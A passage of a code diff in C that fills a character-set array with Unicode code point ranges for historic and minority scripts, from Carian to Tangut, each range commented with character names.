+	c = 0x102a0;		// from CARIAN LETTER A
+	while (c <= 0x102d0)	// ..to CARIAN LETTER UUU3
+		charset[i++] = c++;
+// 102E0..102FF; Coptic Epact Numbers
+	c = 0x102e0;		// from COPTIC EPACT THOUSANDS MARK
+	while (c <= 0x102fb)	// ..to COPTIC EPACT NUMBER NINE HUNDRED
+		charset[i++] = c++;
+// 10300..1032F; Old Italic
+	c = 0x10300;		// from OLD ITALIC LETTER A
+	while (c <= 0x10323)	// ..to OLD ITALIC NUMERAL FIFTY
+		charset[i++] = c++;
+	charset[i++] = 0x1032d;	// OLD ITALIC LETTER YE
+	charset[i++] = 0x1032f;	// OLD ITALIC LETTER SOUTHERN TSE
+// 10330..1034F; Gothic
+	c = 0x10330;		// from GOTHIC LETTER AHSA
+	while (c <= 0x1034a)	// ..to GOTHIC LETTER NINE HUNDRED
+		charset[i++] = c++;
+// 10350..1037F; Old Permic
+	c = 0x10350;		// from OLD PERMIC LETTER AN
+	while (c <= 0x1037a)	// ..to COMBINING OLD PERMIC LETTER SII
+		charset[i++] = c++;
+// 10380..1039F; Ugaritic
+	c = 0x10380;		// from UGARITIC LETTER ALPA
+	while (c <= 0x1039d)	// ..to UGARITIC LETTER SSU
+		charset[i++] = c++;
+	charset[i++] = 0x1039f;	// UGARITIC WORD DIVIDER
+// 103A0..103DF; Old Persian
+	c = 0x103a0;		// from OLD PERSIAN SIGN A
+	while (c <= 0x103c3)	// ..to OLD PERSIAN SIGN HA
+		charset[i++] = c++;
+	c = 0x103c8;		// from OLD PERSIAN SIGN AURAMAZDAA
+	while (c <= 0x103d5)	// ..to OLD PERSIAN NUMBER HUNDRED
+		charset[i++] = c++;
+// 10400..1044F; Deseret
+	c = 0x10400;		// from DESERET CAPITAL LETTER LONG I
+	while (c <= 0x1044f)	// ..to DESERET SMALL LETTER EW
+		charset[i++] = c++;
+// 10450..1047F; Shavian
+	c = 0x10450;		// from SHAVIAN LETTER PEEP
+	while (c <= 0x1047f)	// ..to SHAVIAN LETTER YEW
+		charset[i++] = c++;
+// 10480..104AF; Osmanya
+	c = 0x10480;		// from OSMANYA LETTER ALEF
+	while (c <= 0x1049d)	// ..to OSMANYA LETTER OO
+		charset[i++] = c++;
+	c = 0x104a0;		// from OSMANYA DIGIT ZERO
+	while (c <= 0x104a9)	// ..to OSMANYA DIGIT NINE
+		charset[i++] = c++;
+// 104B0..104FF; Osage
+	c = 0x104b0;		// from OSAGE CAPITAL LETTER A
+	while (c <= 0x104d3)	// ..to OSAGE CAPITAL LETTER ZHA
+		charset[i++] = c++;
+	c = 0x104d8;		// from OSAGE SMALL LETTER A
+	while (c <= 0x104fb)	// ..to OSAGE SMALL LETTER ZHA
+		charset[i++] = c++;
+// 10500..1052F; Elbasan
+	c = 0x10500;		// from ELBASAN LETTER A
+	while (c <= 0x10527)	// ..to ELBASAN LETTER KHE
+		charset[i++] = c++;
+// 10530..1056F; Caucasian Albanian
+	c = 0x10530;		// from CAUCASIAN ALBANIAN LETTER ALT
+	while (c <= 0x10563)	// ..to CAUCASIAN ALBANIAN LETTER KIW
+		charset[i++] = c++;
+	charset[i++] = 0x1056f;	// CAUCASIAN ALBANIAN CITATION MARK
+// 10600..1077F; Linear A
+	c = 0x10600;		// from LINEAR A SIGN AB001
+	while (c <= 0x10736)	// ..to LINEAR A SIGN A664
+		charset[i++] = c++;
+	c = 0x10740;		// from LINEAR A SIGN A701 A
+	while (c <= 0x10755)	// ..to LINEAR A SIGN A732 JE
+		charset[i++] = c++;
+	c = 0x10760;		// from LINEAR A SIGN A800
+	while (c <= 0x10767)	// ..to LINEAR A SIGN A807
+		charset[i++] = c++;
+// 10800..1083F; Cypriot Syllabary
+	c = 0x10800;		// from CYPRIOT SYLLABLE A
+	while (c <= 0x10805)	// ..to CYPRIOT SYLLABLE JA
+		charset[i++] = c++;
+	c = 0x1080a;		// from CYPRIOT SYLLABLE KA
+	while (c <= 0x10835)	// ..to CYPRIOT SYLLABLE WO
+		charset[i++] = c++;
+	charset[i++] = 0x10837;	// CYPRIOT SYLLABLE XA
+	charset[i++] = 0x10838;	// CYPRIOT SYLLABLE XE
+	c = 0x1083c;		// from CYPRIOT SYLLABLE ZA
+	while (c <= 0x1083f)	// ..to CYPRIOT SYLLABLE ZO
+		charset[i++] = c++;
+// 10840..1085F; Imperial Aramaic
+	c = 0x10840;		// from IMPERIAL ARAMAIC LETTER ALEPH
+	while (c <= 0x10855)	// ..to IMPERIAL ARAMAIC LETTER TAW
+		charset[i++] = c++;
+	c = 0x10857;		// from IMPERIAL ARAMAIC SECTION SIGN
+	while (c <= 0x1085f)	// ..to IMPERIAL ARAMAIC NUMBER TEN THOUSAND
+		charset[i++] = c++;
+// 10860..1087F; Palmyrene
+	c = 0x10860;		// from PALMYRENE LETTER ALEPH
+	while (c <= 0x1087f)	// ..to PALMYRENE NUMBER TWENTY
+		charset[i++] = c++;
+// 10880..108AF; Nabataean
+	c = 0x10880;		// from NABATAEAN LETTER FINAL ALEPH
+	while (c <= 0x1089e)	// ..to NABATAEAN LETTER TAW
+		charset[i++] = c++;
+	c = 0x108a7;		// from NABATAEAN NUMBER ONE
+	while (c <= 0x108af)	// ..to NABATAEAN NUMBER ONE HUNDRED
+		charset[i++] = c++;
+// 108E0..108FF; Hatran
+	c = 0x108e0;		// from HATRAN LETTER ALEPH
+	while (c <= 0x108f2)	// ..to HATRAN LETTER QOPH
+		charset[i++] = c++;
+	charset[i++] = 0x108f4;	// HATRAN LETTER SHIN
+	charset[i++] = 0x108f5;	// HATRAN LETTER TAW
+	c = 0x108fb;		// from HATRAN NUMBER ONE
+	while (c <= 0x108ff)	// ..to HATRAN NUMBER ONE HUNDRED
+		charset[i++] = c++;
+// 10900..1091F; Phoenician
+	c = 0x10900;		// from PHOENICIAN LETTER ALF
+	while (c <= 0x1091b)	// ..to PHOENICIAN NUMBER THREE
+		charset[i++] = c++;
+	charset[i++] = 0x1091f;	// PHOENICIAN WORD SEPARATOR
+// 10920..1093F; Lydian
+	c = 0x10920;		// from LYDIAN LETTER A
+	while (c <= 0x10939)	// ..to LYDIAN LETTER C
+		charset[i++] = c++;
+	charset[i++] = 0x1093f;	// LYDIAN TRIANGULAR MARK
+// 10980..1099F; Meroitic Hieroglyphs
+	c = 0x10980;		// from MEROITIC HIEROGLYPHIC LETTER A
+	while (c <= 0x1099f)	// ..to MEROITIC HIEROGLYPHIC SYMBOL VIDJ-2
+		charset[i++] = c++;
+// 109A0..109FF; Meroitic Cursive
+	c = 0x109a0;		// from MEROITIC CURSIVE LETTER A
+	while (c <= 0x109b7)	// ..to MEROITIC CURSIVE LETTER DA
+		charset[i++] = c++;
+	c = 0x109bc;		// from MEROITIC CURSIVE FRACTION ELEVEN TWELFTHS
+	while (c <= 0x109cf)	// ..to MEROITIC CURSIVE NUMBER SEVENTY
+		charset[i++] = c++;
+	c = 0x109d2;		// from MEROITIC CURSIVE NUMBER ONE HUNDRED
+	while (c <= 0x109ff)	// ..to MEROITIC CURSIVE FRACTION TEN TWELFTHS
+		charset[i++] = c++;
+// 10A00..10A5F; Kharoshthi
+	c = 0x10a00;		// from KHAROSHTHI LETTER A
+	while (c <= 0x10a03)	// ..to KHAROSHTHI VOWEL SIGN VOCALIC R
+		charset[i++] = c++;
+	charset[i++] = 0x10a05;	// KHAROSHTHI VOWEL SIGN E
+	charset[i++] = 0x10a06;	// KHAROSHTHI VOWEL SIGN O
+	c = 0x10a0c;		// from KHAROSHTHI VOWEL LENGTH MARK
+	while (c <= 0x10a13)	// ..to KHAROSHTHI LETTER GHA
+		charset[i++] = c++;
+	charset[i++] = 0x10a15;	// KHAROSHTHI LETTER CA
+	charset[i++] = 0x10a17;	// KHAROSHTHI LETTER JA
+	c = 0x10a19;		// from KHAROSHTHI LETTER NYA
+	while (c <= 0x10a35)	// ..to KHAROSHTHI LETTER VHA
+		charset[i++] = c++;
+	charset[i++] = 0x10a38;	// KHAROSHTHI SIGN BAR ABOVE
+	charset[i++] = 0x10a3a;	// KHAROSHTHI SIGN DOT BELOW
+	c = 0x10a3f;		// from KHAROSHTHI VIRAMA
+	while (c <= 0x10a48)	// ..to KHAROSHTHI FRACTION ONE HALF
+		charset[i++] = c++;
+	c = 0x10a50;		// from KHAROSHTHI PUNCTUATION DOT
+	while (c <= 0x10a58)	// ..to KHAROSHTHI PUNCTUATION LINES
+		charset[i++] = c++;
+// 10A60..10A7F; Old South Arabian
+	c = 0x10a60;		// from OLD SOUTH ARABIAN LETTER HE
+	while (c <= 0x10a7f)	// ..to OLD SOUTH ARABIAN NUMERIC INDICATOR
+		charset[i++] = c++;
+// 10A80..10A9F; Old North Arabian
+	c = 0x10a80;		// from OLD NORTH ARABIAN LETTER HEH
+	while (c <= 0x10a9f)	// ..to OLD NORTH ARABIAN NUMBER TWENTY
+		charset[i++] = c++;
+// 10AC0..10AFF; Manichaean
+	c = 0x10ac0;		// from MANICHAEAN LETTER ALEPH
+	while (c <= 0x10ae6)	// ..to MANICHAEAN ABBREVIATION MARK BELOW
+		charset[i++] = c++;
+	c = 0x10aeb;		// from MANICHAEAN NUMBER ONE
+	while (c <= 0x10af6)	// ..to MANICHAEAN PUNCTUATION LINE FILLER
+		charset[i++] = c++;
+// 10B00..10B3F; Avestan
+	c = 0x10b00;		// from AVESTAN LETTER A
+	while (c <= 0x10b35)	// ..to AVESTAN LETTER HE
+		charset[i++] = c++;
+	c = 0x10b39;		// from AVESTAN ABBREVIATION MARK
+	while (c <= 0x10b3f)	// ..to LARGE ONE RING OVER TWO RINGS PUNCTUATION
+		charset[i++] = c++;
+// 10B40..10B5F; Inscriptional Parthian
+	c = 0x10b40;		// from INSCRIPTIONAL PARTHIAN LETTER ALEPH
+	while (c <= 0x10b55)	// ..to INSCRIPTIONAL PARTHIAN LETTER TAW
+		charset[i++] = c++;
+	c = 0x10b58;		// from INSCRIPTIONAL PARTHIAN NUMBER ONE
+	while (c <= 0x10b5f)	// ..to INSCRIPTIONAL PARTHIAN NUMBER ONE THOUSAND
+		charset[i++] = c++;
+// 10B60..10B7F; Inscriptional Pahlavi
+	c = 0x10b60;		// from INSCRIPTIONAL PAHLAVI LETTER ALEPH
+	while (c <= 0x10b72)	// ..to INSCRIPTIONAL PAHLAVI LETTER TAW
+		charset[i++] = c++;
+	c = 0x10b78;		// from INSCRIPTIONAL PAHLAVI NUMBER ONE
+	while (c <= 0x10b7f)	// ..to INSCRIPTIONAL PAHLAVI NUMBER ONE THOUSAND
+		charset[i++] = c++;
+// 10B80..10BAF; Psalter Pahlavi
+	c = 0x10b80;		// from PSALTER PAHLAVI LETTER ALEPH
+	while (c <= 0x10b91)	// ..to PSALTER PAHLAVI LETTER TAW
+		charset[i++] = c++;
+	c = 0x10b99;		// from PSALTER PAHLAVI SECTION MARK
+	while (c <= 0x10b9c)	// ..to PSALTER PAHLAVI FOUR DOTS WITH DOT
+		charset[i++] = c++;
+	c = 0x10ba9;		// from PSALTER PAHLAVI NUMBER ONE
+	while (c <= 0x10baf)	// ..to PSALTER PAHLAVI NUMBER ONE HUNDRED
+		charset[i++] = c++;
+// 10C00..10C4F; Old Turkic
+	c = 0x10c00;		// from OLD TURKIC LETTER ORKHON A
+	while (c <= 0x10c48)	// ..to OLD TURKIC LETTER ORKHON BASH
+		charset[i++] = c++;
+// 10C80..10CFF; Old Hungarian
+	c = 0x10c80;		// from OLD HUNGARIAN CAPITAL LETTER A
+	while (c <= 0x10cb2)	// ..to OLD HUNGARIAN CAPITAL LETTER US
+		charset[i++] = c++;
+	c = 0x10cc0;		// from OLD HUNGARIAN SMALL LETTER A
+	while (c <= 0x10cf2)	// ..to OLD HUNGARIAN SMALL LETTER US
+		charset[i++] = c++;
+	c = 0x10cfa;		// from OLD HUNGARIAN NUMBER ONE
+	while (c <= 0x10cff)	// ..to OLD HUNGARIAN NUMBER ONE THOUSAND
+		charset[i++] = c++;
+// 10D00..10D3F; Hanifi Rohingya
+	c = 0x10d00;		// from HANIFI ROHINGYA LETTER A
+	while (c <= 0x10d27)	// ..to HANIFI ROHINGYA SIGN TASSI
+		charset[i++] = c++;
+	c = 0x10d30;		// from HANIFI ROHINGYA DIGIT ZERO
+	while (c <= 0x10d39)	// ..to HANIFI ROHINGYA DIGIT NINE
+		charset[i++] = c++;
+// 10E60..10E7F; Rumi Numeral Symbols
+	c = 0x10e60;		// from RUMI DIGIT ONE
+	while (c <= 0x10e7e)	// ..to RUMI FRACTION TWO THIRDS
+		charset[i++] = c++;
+// 10F00..10F2F; Old Sogdian
+	c = 0x10f00;		// from OLD SOGDIAN LETTER ALEPH
+	while (c <= 0x10f27)	// ..to OLD SOGDIAN LIGATURE AYIN-DALETH
+		charset[i++] = c++;
+// 10F30..10F6F; Sogdian
+	c = 0x10f30;		// from SOGDIAN LETTER ALEPH
+	while (c <= 0x10f59)	// ..to SOGDIAN PUNCTUATION HALF CIRCLE WITH DOT
+		charset[i++] = c++;
+// 11000..1107F; Brahmi
+	c = 0x11000;		// from BRAHMI SIGN CANDRABINDU
+	while (c <= 0x1104d)	// ..to BRAHMI PUNCTUATION LOTUS
+		charset[i++] = c++;
+	c = 0x11052;		// from BRAHMI NUMBER ONE
+	while (c <= 0x1106f)	// ..to BRAHMI DIGIT NINE
+		charset[i++] = c++;
+	charset[i++] = 0x1107f;	// BRAHMI NUMBER JOINER
+// 11080..110CF; Kaithi
+	c = 0x11080;		// from KAITHI SIGN CANDRABINDU
+	while (c <= 0x110c1)	// ..to KAITHI DOUBLE DANDA
+		charset[i++] = c++;
+	charset[i++] = 0x110cd;	// KAITHI NUMBER SIGN ABOVE
+// 110D0..110FF; Sora Sompeng
+	c = 0x110d0;		// from SORA SOMPENG LETTER SAH
+	while (c <= 0x110e8)	// ..to SORA SOMPENG LETTER MAE
+		charset[i++] = c++;
+	c = 0x110f0;		// from SORA SOMPENG DIGIT ZERO
+	while (c <= 0x110f9)	// ..to SORA SOMPENG DIGIT NINE
+		charset[i++] = c++;
+// 11100..1114F; Chakma
+	c = 0x11100;		// from CHAKMA SIGN CANDRABINDU
+	while (c <= 0x11134)	// ..to CHAKMA MAAYYAA
+		charset[i++] = c++;
+	c = 0x11136;		// from CHAKMA DIGIT ZERO
+	while (c <= 0x11146)	// ..to CHAKMA VOWEL SIGN EI
+		charset[i++] = c++;
+// 11150..1117F; Mahajani
+	c = 0x11150;		// from MAHAJANI LETTER A
+	while (c <= 0x11176)	// ..to MAHAJANI LIGATURE SHRI
+		charset[i++] = c++;
+// 11180..111DF; Sharada
+	c = 0x11180;		// from SHARADA SIGN CANDRABINDU
+	while (c <= 0x111cd)	// ..to SHARADA SUTRA MARK
+		charset[i++] = c++;
+	c = 0x111d0;		// from SHARADA DIGIT ZERO
+	while (c <= 0x111df)	// ..to SHARADA SECTION MARK-2
+		charset[i++] = c++;
+// 111E0..111FF; Sinhala Archaic Numbers
+	c = 0x111e1;		// from SINHALA ARCHAIC DIGIT ONE
+	while (c <= 0x111f4)	// ..to SINHALA ARCHAIC NUMBER ONE THOUSAND
+		charset[i++] = c++;
+// 11200..1124F; Khojki
+	c = 0x11200;		// from KHOJKI LETTER A
+	while (c <= 0x11211)	// ..to KHOJKI LETTER JJA
+		charset[i++] = c++;
+	c = 0x11213;		// from KHOJKI LETTER NYA
+	while (c <= 0x1123e)	// ..to KHOJKI SIGN SUKUN
+		charset[i++] = c++;
+// 11280..112AF; Multani
+	c = 0x11280;		// from MULTANI LETTER A
+	while (c <= 0x11286)	// ..to MULTANI LETTER GA
+		charset[i++] = c++;
+	c = 0x1128a;		// from MULTANI LETTER CA
+	while (c <= 0x1128d)	// ..to MULTANI LETTER JJA
+		charset[i++] = c++;
+	c = 0x1128f;		// from MULTANI LETTER NYA
+	while (c <= 0x1129d)	// ..to MULTANI LETTER BA
+		charset[i++] = c++;
+	c = 0x1129f;		// from MULTANI LETTER BHA
+	while (c <= 0x112a9)	// ..to MULTANI SECTION MARK
+		charset[i++] = c++;
+// 112B0..112FF; Khudawadi
+	c = 0x112b0;		// from KHUDAWADI LETTER A
+	while (c <= 0x112ea)	// ..to KHUDAWADI SIGN VIRAMA
+		charset[i++] = c++;
+	c = 0x112f0;		// from KHUDAWADI DIGIT ZERO
+	while (c <= 0x112f9)	// ..to KHUDAWADI DIGIT NINE
+		charset[i++] = c++;
+// 11300..1137F; Grantha
+	c = 0x11300;		// from GRANTHA SIGN COMBINING ANUSVARA ABOVE
+	while (c <= 0x11303)	// ..to GRANTHA SIGN VISARGA
+		charset[i++] = c++;
+	c = 0x11305;		// from GRANTHA LETTER A
+	while (c <= 0x1130c)	// ..to GRANTHA LETTER VOCALIC L
+		charset[i++] = c++;
+	charset[i++] = 0x1130f;	// GRANTHA LETTER EE
+	charset[i++] = 0x11310;	// GRANTHA LETTER AI
+	c = 0x11313;		// from GRANTHA LETTER OO
+	while (c <= 0x11328)	// ..to GRANTHA LETTER NA
+		charset[i++] = c++;
+	c = 0x1132a;		// from GRANTHA LETTER PA
+	while (c <= 0x11330)	// ..to GRANTHA LETTER RA
+		charset[i++] = c++;
+	charset[i++] = 0x11332;	// GRANTHA LETTER LA
+	charset[i++] = 0x11333;	// GRANTHA LETTER LLA
+	c = 0x11335;		// from GRANTHA LETTER VA
+	while (c <= 0x11339)	// ..to GRANTHA LETTER HA
+		charset[i++] = c++;
+	c = 0x1133b;		// from COMBINING BINDU BELOW
+	while (c <= 0x11344)	// ..to GRANTHA VOWEL SIGN VOCALIC RR
+		charset[i++] = c++;
+	charset[i++] = 0x11347;	// GRANTHA VOWEL SIGN EE
+	charset[i++] = 0x11348;	// GRANTHA VOWEL SIGN AI
+	charset[i++] = 0x1134b;	// GRANTHA VOWEL SIGN OO
+	charset[i++] = 0x1134d;	// GRANTHA SIGN VIRAMA
+	c = 0x1135d;		// from GRANTHA SIGN PLUTA
+	while (c <= 0x11363)	// ..to GRANTHA VOWEL SIGN VOCALIC LL
+		charset[i++] = c++;
+	c = 0x11366;		// from COMBINING GRANTHA DIGIT ZERO
+	while (c <= 0x1136c)	// ..to COMBINING GRANTHA DIGIT SIX
+		charset[i++] = c++;
+	c = 0x11370;		// from COMBINING GRANTHA LETTER A
+	while (c <= 0x11374)	// ..to COMBINING GRANTHA LETTER PA
+		charset[i++] = c++;
+// 11400..1147F; Newa
+	c = 0x11400;		// from NEWA LETTER A
+	while (c <= 0x11459)	// ..to NEWA DIGIT NINE
+		charset[i++] = c++;
+	charset[i++] = 0x1145d;	// NEWA INSERTION SIGN
+	charset[i++] = 0x1145e;	// NEWA SANDHI MARK
+// 11480..114DF; Tirhuta
+	c = 0x11480;		// from TIRHUTA ANJI
+	while (c <= 0x114c7)	// ..to TIRHUTA OM
+		charset[i++] = c++;
+	c = 0x114d0;		// from TIRHUTA DIGIT ZERO
+	while (c <= 0x114d9)	// ..to TIRHUTA DIGIT NINE
+		charset[i++] = c++;
+// 11580..115FF; Siddham
+	c = 0x11580;		// from SIDDHAM LETTER A
+	while (c <= 0x115b5)	// ..to SIDDHAM VOWEL SIGN VOCALIC RR
+		charset[i++] = c++;
+	c = 0x115b8;		// from SIDDHAM VOWEL SIGN E
+	while (c <= 0x115dd)	// ..to SIDDHAM VOWEL SIGN ALTERNATE UU
+		charset[i++] = c++;
+// 11600..1165F; Modi
+	c = 0x11600;		// from MODI LETTER A
+	while (c <= 0x11644)	// ..to MODI SIGN HUVA
+		charset[i++] = c++;
+	c = 0x11650;		// from MODI DIGIT ZERO
+	while (c <= 0x11659)	// ..to MODI DIGIT NINE
+		charset[i++] = c++;
+// 11660..1167F; Mongolian Supplement
+	c = 0x11660;		// from MONGOLIAN BIRGA WITH ORNAMENT
+	while (c <= 0x1166c)	// ..to MONGOLIAN TURNED SWIRL BIRGA WITH DOUBLE ORNAMENT
+		charset[i++] = c++;
+// 11680..116CF; Takri
+	c = 0x11680;		// from TAKRI LETTER A
+	while (c <= 0x116b7)	// ..to TAKRI SIGN NUKTA
+		charset[i++] = c++;
+	c = 0x116c0;		// from TAKRI DIGIT ZERO
+	while (c <= 0x116c9)	// ..to TAKRI DIGIT NINE
+		charset[i++] = c++;
+// 11700..1173F; Ahom
+	c = 0x11700;		// from AHOM LETTER KA
+	while (c <= 0x1171a)	// ..to AHOM LETTER ALTERNATE BA
+		charset[i++] = c++;
+	c = 0x1171d;		// from AHOM CONSONANT SIGN MEDIAL LA
+	while (c <= 0x1172b)	// ..to AHOM SIGN KILLER
+		charset[i++] = c++;
+	c = 0x11730;		// from AHOM DIGIT ZERO
+	while (c <= 0x1173f)	// ..to AHOM SYMBOL VI
+		charset[i++] = c++;
+// 11800..1184F; Dogra
+	c = 0x11800;		// from DOGRA LETTER A
+	while (c <= 0x1183b)	// ..to DOGRA ABBREVIATION SIGN
+		charset[i++] = c++;
+// 118A0..118FF; Warang Citi
+	c = 0x118a0;		// from WARANG CITI CAPITAL LETTER NGAA
+	while (c <= 0x118f2)	// ..to WARANG CITI NUMBER NINETY
+		charset[i++] = c++;
+	charset[i++] = 0x118ff;	// WARANG CITI OM
+// 11A00..11A4F; Zanabazar Square
+	c = 0x11a00;		// from ZANABAZAR SQUARE LETTER A
+	while (c <= 0x11a47)	// ..to ZANABAZAR SQUARE SUBJOINER
+		charset[i++] = c++;
+// 11A50..11AAF; Soyombo
+	c = 0x11a50;		// from SOYOMBO LETTER A
+	while (c <= 0x11a83)	// ..to SOYOMBO LETTER KSSA
+		charset[i++] = c++;
+	c = 0x11a86;		// from SOYOMBO CLUSTER-INITIAL LETTER RA
+	while (c <= 0x11aa2)	// ..to SOYOMBO TERMINAL MARK-2
+		charset[i++] = c++;
+// 11AC0..11AFF; Pau Cin Hau
+	c = 0x11ac0;		// from PAU CIN HAU LETTER PA
+	while (c <= 0x11af8)	// ..to PAU CIN HAU GLOTTAL STOP FINAL
+		charset[i++] = c++;
+// 11C00..11C6F; Bhaiksuki
+	c = 0x11c00;		// from BHAIKSUKI LETTER A
+	while (c <= 0x11c08)	// ..to BHAIKSUKI LETTER VOCALIC L
+		charset[i++] = c++;
+	c = 0x11c0a;		// from BHAIKSUKI LETTER E
+	while (c <= 0x11c36)	// ..to BHAIKSUKI VOWEL SIGN VOCALIC L
+		charset[i++] = c++;
+	c = 0x11c38;		// from BHAIKSUKI VOWEL SIGN E
+	while (c <= 0x11c45)	// ..to BHAIKSUKI GAP FILLER-2
+		charset[i++] = c++;
+	c = 0x11c50;		// from BHAIKSUKI DIGIT ZERO
+	while (c <= 0x11c6c)	// ..to BHAIKSUKI HUNDREDS UNIT MARK
+		charset[i++] = c++;
+// 11C70..11CBF; Marchen
+	c = 0x11c70;		// from MARCHEN HEAD MARK
+	while (c <= 0x11c8f)	// ..to MARCHEN LETTER A
+		charset[i++] = c++;
+	c = 0x11c92;		// from MARCHEN SUBJOINED LETTER KA
+	while (c <= 0x11ca7)	// ..to MARCHEN SUBJOINED LETTER ZA
+		charset[i++] = c++;
+	c = 0x11ca9;		// from MARCHEN SUBJOINED LETTER YA
+	while (c <= 0x11cb6)	// ..to MARCHEN SIGN CANDRABINDU
+		charset[i++] = c++;
+// 11D00..11D5F; Masaram Gondi
+	c = 0x11d00;		// from MASARAM GONDI LETTER A
+	while (c <= 0x11d06)	// ..to MASARAM GONDI LETTER E
+		charset[i++] = c++;
+	charset[i++] = 0x11d08;	// MASARAM GONDI LETTER AI
+	charset[i++] = 0x11d09;	// MASARAM GONDI LETTER O
+	c = 0x11d0b;		// from MASARAM GONDI LETTER AU
+	while (c <= 0x11d36)	// ..to MASARAM GONDI VOWEL SIGN VOCALIC R
+		charset[i++] = c++;
+	charset[i++] = 0x11d3c;	// MASARAM GONDI VOWEL SIGN AI
+	charset[i++] = 0x11d3d;	// MASARAM GONDI VOWEL SIGN O
+	c = 0x11d3f;		// from MASARAM GONDI VOWEL SIGN AU
+	while (c <= 0x11d47)	// ..to MASARAM GONDI RA-KARA
+		charset[i++] = c++;
+	c = 0x11d50;		// from MASARAM GONDI DIGIT ZERO
+	while (c <= 0x11d59)	// ..to MASARAM GONDI DIGIT NINE
+		charset[i++] = c++;
+// 11D60..11DAF; Gunjala Gondi
+	c = 0x11d60;		// from GUNJALA GONDI LETTER A
+	while (c <= 0x11d65)	// ..to GUNJALA GONDI LETTER UU
+		charset[i++] = c++;
+	charset[i++] = 0x11d67;	// GUNJALA GONDI LETTER EE
+	charset[i++] = 0x11d68;	// GUNJALA GONDI LETTER AI
+	c = 0x11d6a;		// from GUNJALA GONDI LETTER OO
+	while (c <= 0x11d8e)	// ..to GUNJALA GONDI VOWEL SIGN UU
+		charset[i++] = c++;
+	charset[i++] = 0x11d90;	// GUNJALA GONDI VOWEL SIGN EE
+	charset[i++] = 0x11d91;	// GUNJALA GONDI VOWEL SIGN AI
+	c = 0x11d93;		// from GUNJALA GONDI VOWEL SIGN OO
+	while (c <= 0x11d98)	// ..to GUNJALA GONDI OM
+		charset[i++] = c++;
+	c = 0x11da0;		// from GUNJALA GONDI DIGIT ZERO
+	while (c <= 0x11da9)	// ..to GUNJALA GONDI DIGIT NINE
+		charset[i++] = c++;
+// 11EE0..11EFF; Makasar
+	c = 0x11ee0;		// from MAKASAR LETTER KA
+	while (c <= 0x11ef8)	// ..to MAKASAR END OF SECTION
+		charset[i++] = c++;
+// 12000..123FF; Cuneiform
+	c = 0x12000;		// from CUNEIFORM SIGN A
+	while (c <= 0x12399)	// ..to CUNEIFORM SIGN U U
+		charset[i++] = c++;
+// 12400..1247F; Cuneiform Numbers and Punctuation
+	c = 0x12400;		// from CUNEIFORM NUMERIC SIGN TWO ASH
+	while (c <= 0x1246e)	// ..to CUNEIFORM NUMERIC SIGN NINE U VARIANT FORM
+		charset[i++] = c++;
+	c = 0x12470;		// from CUNEIFORM PUNCTUATION SIGN OLD ASSYRIAN WORD DIVIDER
+	while (c <= 0x12474)	// ..to CUNEIFORM PUNCTUATION SIGN DIAGONAL QUADCOLON
+		charset[i++] = c++;
+// 12480..1254F; Early Dynastic Cuneiform
+	c = 0x12480;		// from CUNEIFORM SIGN AB TIMES NUN TENU
+	while (c <= 0x12543)	// ..to CUNEIFORM SIGN ZU5 TIMES THREE DISH TENU
+		charset[i++] = c++;
+// 13000..1342F; Egyptian Hieroglyphs
+	c = 0x13000;		// from EGYPTIAN HIEROGLYPH A001
+	while (c <= 0x1342e)	// ..to EGYPTIAN HIEROGLYPH AA032
+		charset[i++] = c++;
+// 14400..1467F; Anatolian Hieroglyphs
+	c = 0x14400;		// from ANATOLIAN HIEROGLYPH A001
+	while (c <= 0x14646)	// ..to ANATOLIAN HIEROGLYPH A530
+		charset[i++] = c++;
+// 16800..16A3F; Bamum Supplement
+	c = 0x16800;		// from BAMUM LETTER PHASE-A NGKUE MFON
+	while (c <= 0x16a38)	// ..to BAMUM LETTER PHASE-F VUEQ
+		charset[i++] = c++;
+// 16A40..16A6F; Mro
+	c = 0x16a40;		// from MRO LETTER TA
+	while (c <= 0x16a5e)	// ..to MRO LETTER TEK
+		charset[i++] = c++;
+	c = 0x16a60;		// from MRO DIGIT ZERO
+	while (c <= 0x16a69)	// ..to MRO DIGIT NINE
+		charset[i++] = c++;
+	charset[i++] = 0x16a6e;	// MRO DANDA
+	charset[i++] = 0x16a6f;	// MRO DOUBLE DANDA
+// 16AD0..16AFF; Bassa Vah
+	c = 0x16ad0;		// from BASSA VAH LETTER ENNI
+	while (c <= 0x16aed)	// ..to BASSA VAH LETTER I
+		charset[i++] = c++;
+	c = 0x16af0;		// from BASSA VAH COMBINING HIGH TONE
+	while (c <= 0x16af5)	// ..to BASSA VAH FULL STOP
+		charset[i++] = c++;
+// 16B00..16B8F; Pahawh Hmong
+	c = 0x16b00;		// from PAHAWH HMONG VOWEL KEEB
+	while (c <= 0x16b45)	// ..to PAHAWH HMONG SIGN CIM TSOV ROG
+		charset[i++] = c++;
+	c = 0x16b50;		// from PAHAWH HMONG DIGIT ZERO
+	while (c <= 0x16b59)	// ..to PAHAWH HMONG DIGIT NINE
+		charset[i++] = c++;
+	c = 0x16b5b;		// from PAHAWH HMONG NUMBER TENS
+	while (c <= 0x16b61)	// ..to PAHAWH HMONG NUMBER TRILLIONS
+		charset[i++] = c++;
+	c = 0x16b63;		// from PAHAWH HMONG SIGN VOS LUB
+	while (c <= 0x16b77)	// ..to PAHAWH HMONG SIGN CIM NRES TOS
+		charset[i++] = c++;
+	c = 0x16b7d;		// from PAHAWH HMONG CLAN SIGN TSHEEJ
+	while (c <= 0x16b8f)	// ..to PAHAWH HMONG CLAN SIGN VWJ
+		charset[i++] = c++;
+// 16E40..16E9F; Medefaidrin
+	c = 0x16e40;		// from MEDEFAIDRIN CAPITAL LETTER M
+	while (c <= 0x16e9a)	// ..to MEDEFAIDRIN EXCLAMATION OH
+		charset[i++] = c++;
+// 16F00..16F9F; Miao
+	c = 0x16f00;		// from MIAO LETTER PA
+	while (c <= 0x16f44)	// ..to MIAO LETTER HHA
+		charset[i++] = c++;
+	c = 0x16f50;		// from MIAO LETTER NASALIZATION
+	while (c <= 0x16f7e)	// ..to MIAO VOWEL SIGN NG
+		charset[i++] = c++;
+	c = 0x16f8f;		// from MIAO TONE RIGHT
+	while (c <= 0x16f9f)	// ..to MIAO LETTER REFORMED TONE-8
+		charset[i++] = c++;
+// 16FE0..16FFF; Ideographic Symbols and Punctuation
+	charset[i++] = 0x16fe0;	// TANGUT ITERATION MARK
+	charset[i++] = 0x16fe1;	// NUSHU ITERATION MARK
+// 17000..187FF; Tangut
+	c = 0x17000;		// from <Tangut Ideograph, First>
+	while (c <= 0x187f1)	// ..to <Tangut Ideograph, Last>
+		charset[i++] = c++;
+// 18800..18AFF; Tangut Components
+	c = 0x18800;		// from TANGUT COMPONENT-001
